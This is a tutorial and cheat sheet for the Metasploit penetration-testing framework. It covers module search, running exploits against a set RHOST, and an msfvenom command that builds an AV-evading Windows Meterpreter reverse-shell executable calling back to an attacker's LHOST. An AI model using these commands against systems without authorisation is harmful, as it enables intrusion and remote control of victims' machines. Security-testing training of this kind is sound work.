Pentesting with Metasploit the Vulnerability Exploitation Tool (with Cheat Sheets)
Metasploit is the ultimate penetration testing tool for offensive security. It is so easy to use that you could claim to be a hacker just by running a few commands, and it is incredibly powerful as well. This guide is a general overview of how Metasploit can be used.
1. Getting started
Start the Metasploit console.
$ msfconsole # Start the console
The console will now show the msf shell. You can provide commands on the shell to run various Metasploit modules.
Metasploit continuously adds new modules to its collection. To make sure you always have the latest exploits, run:
$ msfupdate # Update the framework and its modules (run from the system shell, not the msf prompt)
Metasploit is quite big and it’s easy to get lost. If you need help, run:
msf > help # Show help
The output of the help command might feel overwhelming as well, but don’t worry: you’ll always have this blog post to help you out.
2. Metasploit Modules
Metasploit has thousands of modules. They are arranged in the following categories:
- Exploits: The most commonly used category. An exploit module delivers a payload to the target and triggers it.
- Payloads: Code that runs on the target once an exploit succeeds (for example a shell or a Meterpreter session).
- Encoders: Transform a payload so that it is not detected by firewalls/anti-malware programs. Note that popular encoders are themselves well known to AV vendors, so encoding alone is no guarantee of evasion.
- Nops: Keep payload sizes consistent when encoders encode a payload (learn more about NOP sleds).
- Post: Modules that assist post-exploitation.
- Auxiliary: Port scanners, fuzzers, sniffers, and other helper modules.
You can list the modules under each of these categories. Check what exists by running:
msf > show exploits
msf > show payloads
3. Searching for Modules
If you’ve tried show exploits, you’ve probably seen a huge list of modules. It’s impossible to go through this list by hand to find what you need, so use the search command to filter for the modules you want. Run:
msf > search ftp
This lists modules that target FTP servers. You can filter on more criteria:
msf > search ftp platform:windows rank:excellent
This shows excellent-ranked FTP server exploits for Windows machines. You can filter on the following fields:
4. Run an Exploit
The following series of console commands is typically used to run an exploit in Metasploit.
First, select the module you want to run:
msf > use exploit/[ExploitModule]
Modules have multiple options that must be set before execution. To see which options can be set, run:
msf > show options
After reviewing the options, set their values like this:
msf > set [Option] [Value]
msf > set RHOST 10.100.101.12 # example
msf > set RPORT 8000 # example
Now start the exploit:
msf > exploit
5. Make Payloads with Msfvenom
Sometimes you’ll need to create standalone files as payloads to send them to your target. Msfvenom is a CLI tool that can help with creating these files.
First, list the payloads and encoders that msfvenom offers. Payloads carry out the attack and encoders encode a payload so that it can evade AVs.
$ msfvenom -l payloads # Payloads
$ msfvenom -l encoders # Encoders
A typical msfvenom command that generates a payload looks like this. LHOST is the address the reverse connection calls back to, and -f selects the output format:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=4444 \
    -e x86/shikata_ga_nai -i 5 -f exe > met.exe
Other output formats, such as pl, rb and py, can also be selected with -f.